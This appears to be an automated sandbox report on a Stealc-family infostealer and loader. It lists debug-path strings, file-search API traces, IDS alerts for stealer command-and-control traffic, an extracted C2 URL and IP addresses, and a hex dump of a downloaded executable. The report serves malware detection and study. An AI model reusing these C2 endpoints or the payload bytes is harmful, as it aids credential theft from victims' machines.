Source:	Binary string: FC:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: mozglue.pdb source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044464664.0000020EEBE00000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021461752.0000020EEAA30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.1995525658.000000006C9F7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000E.00000002.2357108993.000000006C417000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021663380.0000020EEAA60000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\keyoy_nutanikitibaha.pdb source: VucRf0jboS.exe, 00000000.00000003.1758649321.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000000.1756183454.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: nss3.pdb source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C8F261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	3_2_6C8F261E

Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local\Temp\u5qk.2	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.76/3cd2b41cbde8fc9c.php
Source: Malware configuration extractor	URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647

Yara detected Generic Downloader

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49753 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 23:31:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 23:30:02 GMTETag: "47e00-617084867e629"Accept-Ranges: bytesContent-Length: 294400Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 34 51 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 80 e4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 93 01 00 28 00 00 00 00 f0 c1 03 88 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c3 03 54 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 88 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 6c 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 4c c0 03 00 a0 01 00 00 72 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 68 01 00 00 f0 c1 03 00 6a 01 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 14 00 00 00 60 c3 03 00 16 00 00 00 68 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
